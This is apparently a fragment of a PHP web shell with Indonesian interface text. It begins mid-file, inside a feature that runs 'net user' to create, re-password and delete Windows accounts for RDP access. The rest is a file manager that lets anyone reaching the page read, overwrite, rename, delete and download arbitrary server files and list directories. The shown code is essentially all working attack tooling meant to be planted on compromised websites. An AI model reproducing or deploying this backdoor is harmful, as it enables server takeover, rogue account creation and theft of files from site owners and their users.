if(preg_match("/$user/", exe("net user"))) {
echo "[change password: <font color=lime
>global</font>] -> ";
if($cek) {
echo "<font color=blue>Berhasil<
/font>";
} else {
echo "<font color=red>red</font>
";
}
} else {
echo "[INFO] -> <font color=blue>user <f
ont color=blue>$user</font> belum ada</font>";
}
} elseif($_POST['opsi'] == '3') {
$cek = exe("net user $user /DELETE");
if(preg_match("/$user/", exe("net user"))) {
echo "[remove user: <font color=lime>$us
er</font>] -> ";
if($cek) {
echo "<font color=lime>Berhasil<
/font>";
} else {
echo "<font color=red>Gagal</fon
t>";
}
} else {
echo "[INFO] -> <font color=white>user <
font color=blue>$user</font> belum ada</font>";
}
} else {
//

}
} else {
echo "-- Create RDP --<br>
<form method='post'>
<input type='text' name='user' placeholder='username' va
lue='global' required>
<input type='text' name='pass' placeholder='password' va
lue='global' required>
<input type='submit' name='create' value='>>'>
</form>
-- Option --<br>
<form method='post'>
<input type='text' name='r_user' placeholder='username'
required>
<select name='opsi'>
<option value='1'>Cek Username</option>
<option value='2'>Ubah Password</option>
<option value='3'>Hapus Username</option>
</select>
<input type='submit' name='s_opsi' value='>>'>
</form>
";
}
} else {
echo "<font color=white>Fitur ini hanya dapat digunakan dalam Wi
ndows Server.</font>";
}
} elseif($_GET['act'] == 'newfile') {
if($_POST['new_save_file']) {
$newfile = htmlspecialchars($_POST['newfile']);
$fopen = fopen($newfile, "a+");
if($fopen) {
$act = "<script>window.location='?act=edit&dir=".$dir."&
file=".$_POST['newfile']."';</script>";
} else {
$act = "<font color=red>permission denied</font>";
}
}
echo $act;
echo "<form method='post'>
Filename: <input type='text' name='newfile' value='$dir/newfile.php' sty
le='width: 450px;' height='10'>
<input type='submit' name='new_save_file' value='Submit'>
</form>";
} elseif($_GET['act'] == 'newfolder') {
if($_POST['new_save_folder']) {
$new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
if(!mkdir($new_folder)) {
$act = "<font color=white>permission denied</font>";
} else {
$act = "<script>window.location='?dir=".$dir."';</script
>";
}
}
echo $act;
echo "<form method='post'>
Folder Name: <input type='text' name='newfolder' style='width: 450px;' h
eight='10'>
<input type='submit' name='new_save_folder' value='Submit'>
</form>";

} elseif($_GET['act'] == 'rename_dir') {
if($_POST['dir_rename']) {
$dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars
($_POST['fol_rename'])."");
if($dir_rename) {
$act = "<script>window.location='?dir=".dirname($dir)."'
;</script>";
} else {
$act = "<font color=red>permission denied</font>";
}
echo "".$act."<br>";
}
echo "<form method='post'>
<input type='text' value='".basename($dir)."' name='fol_rename' style='w
idth: 450px;' height='10'>
<input type='submit' name='dir_rename' value='rename'>
</form>";
} elseif($_GET['act'] == 'delete_dir') {
$delete_dir = rmdir($dir);
if($delete_dir) {
$act = "<script>window.location='?dir=".dirname($dir)."';</scrip
t>";
} else {
$act = "<font color=red>could not remove ".basename($dir)."</fon
t>";
}
echo $act;
} elseif($_GET['act'] == 'view') {
echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a
href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?
act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=
$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file
=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET[
'file']."'>delete</a> ]<br>";
echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['fi
le']))."</textarea>";
} elseif($_GET['act'] == 'edit') {
if($_POST['save']) {
$save = file_put_contents($_GET['file'], $_POST['src']);
if($save) {
$act = "<font color=lime>Saved!</font>";
} else {
$act = "<font color=red>permission denied</font>";
}
echo "".$act."<br>";
}
echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a
href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edi
t&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=
$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file
=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET[
'file']."'>delete</a> ]<br>";
echo "<form method='post'>
<textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']
))."</textarea><br>
<input type='submit' value='Save' name='save' style='width: 500px;'>
</form>";
} elseif($_GET['act'] == 'rename') {
if($_POST['do_rename']) {
$rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST[

'rename'])."");
if($rename) {
$act = "<script>window.location='?dir=".$dir."';</script
>";
} else {
$act = "<font color=red>permission denied</font>";
}
echo "".$act."<br>";
}
echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a
href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edi
t&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&fi
le=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file
=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET[
'file']."'>delete</a> ]<br>";
echo "<form method='post'>
<input type='text' value='".basename($_GET['file'])."' name='rename' sty
le='width: 450px;' height='10'>
<input type='submit' name='do_rename' value='rename'>
</form>";
} elseif($_GET['act'] == 'delete') {
$delete = unlink($_GET['file']);
if($delete) {
$act = "<script>window.location='?dir=".$dir."';</script>";
} else {
$act = "<font color=white>permission denied</font>";
}
echo $act;
} elseif(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'down
load')) {
@ob_clean();
$file = $_GET['file'];
@header('Content-Description: File Transfer');
@header('Content-Type: application/octet-stream');
@header('Content-Disposition: attachment; filename="'.basename($file).'"
');
@header('Expires: 0');
@header('Cache-Control: must-revalidate');
@header('Pragma: public');
@header('Content-Length: ' . filesize($file));
readfile($file);
exit;
} else {
if(is_dir($dir) === true) {
if(!is_readable($dir)) {
echo "<font color=red>can't open directory. ( not readab
le )</font>";
} else {
echo '<table width="100%" class="table_home" border="0"
cellpadding="3" cellspacing="1" align="center">
<tr>
<th class="th_home"><center>Name</center></th>
<th class="th_home"><center>Type</center></th>
<th class="th_home"><center>Size</center></th>
<th class="th_home"><center>Last Modified</center></th>
<th class="th_home"><center>Owner/Group</center></th>
<th class="th_home"><center>Permission</center></th>
<th class="th_home"><center>Action</center></th>
</tr>';
$scandir = scandir($dir);

foreach($scandir as $dirx) {
$dtype = filetype("$dir/$dirx");
$dtime = date("F d Y g:i:s", filemtime("$dir/$di
rx"));
if(function_exists('posix_getpwuid')) {
$downer = @posix_getpwuid(fileowner("$di
r/$dirx"));
$downer = $downer['name'];
} else {
//$downer = $uid;
$downer = fileowner("$dir/$dirx");
}
if(function_exists('posix_getgrgid')) {
$dgrp = @posix_getgrgid(filegroup("$dir/
$dirx"));
$dgrp = $dgrp['name'];
} else {
$dgrp = filegroup("$dir/$dirx");
}
if(!is_dir("$dir/$dirx")) continue;
if($dirx === '..') {
$href = "<a href='?dir=".dirname($dir)."
'>$dirx</a>";
} elseif($dirx === '.') {
$href = "<a href='?dir=$dir'>$dirx</a>";
} else {
$href = "<a href='?dir=$dir/$dirx'>$dirx
</a>";
}
if($dirx === '.' || $dirx === '..') {
$act_dir = "<a href='?act=newfile&dir=$d
ir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
} else {
$act_dir = "<a href='?act=rename_dir&dir
=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
}
echo "<tr>";
echo "<td class='td_home'><img src='data:image/p
ng;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAA
AAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoM
qCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$h
ref</td>";
echo "<td class='td_home'><center>$dtype</center
></td>";
echo "<td class='td_home'><center>-</center></th
></td>";
echo "<td class='td_home'><center>$dtime</center
></td>";
echo "<td class='td_home'><center>$downer/$dgrp<
/center></td>";
echo "<td class='td_home'><center>".w("$dir/$dir
x",perms("$dir/$dirx"))."</center></td>";
echo "<td class='td_home' style='padding-left: 1
5px;'>$act_dir</td>";
echo "</tr>";
}
}
} else {
echo "<font color=red>can't open directory.</font>";
}

foreach($scandir as $file) {
$ftype = filetype("$dir/$file");
$ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
$size = filesize("$dir/$file")/1024;
$size = round($size,3);
if(function_exists('posix_getpwuid')) {
$fowner = @posix_getpwuid(fileowner("$dir/$file"
));
$fowner = $fowner['name'];
} else {
//$downer = $uid;
$fowner = fileowner("$dir/$file");
}
if(function_exists('posix_getgrgid')) {
$fgrp = @posix_getgrgid(filegroup("$dir/$file"))
;
$fgrp = $fgrp['name'];
} else {
$fgrp = filegroup("$dir/$file");
}
if($size > 1024) {
$size = round($size/1024,2). 'MB';
} else {
$size = $size. 'KB';
}
if(!is_file("$dir/$file")) continue;
echo "<tr>";
echo "<td class='td_home'><img src='data:image/png;base6
4,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/w
D/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9Th
xZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9P
Az0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKK
odiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7Go
CUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev
0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZ
YjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw
/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC
7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uE
junpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73
+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='>
<a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
echo "<td class='td_home'><center>$ftype</center></td>";
echo "<td class='td_home'><center>$size</center></td>";
echo "<td class='td_home'><center>$ftime</center></td>";
echo "<td class='td_home'><center>$fowner/$fgrp</center>
</td>";
echo "<td class='td_home'><center>".w("$dir/$file",perms
("$dir/$file"))."</center></td>";
echo "<td class='td_home' style='padding-left: 15px;'><a
href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$
dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'
>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>
";
echo "</tr>";
}
echo "</table>";
if(!is_readable($dir)) {
//
} else {
echo "<hr>";

}
echo "<center>Copyright &copy; ".date("Y")." - <a href='http://www.xaisy
ndicate.ml/' target='_blank'><font color=lime>By J0nnathan Miles </font></a></ce
nter>";
}
?>

Você também pode gostar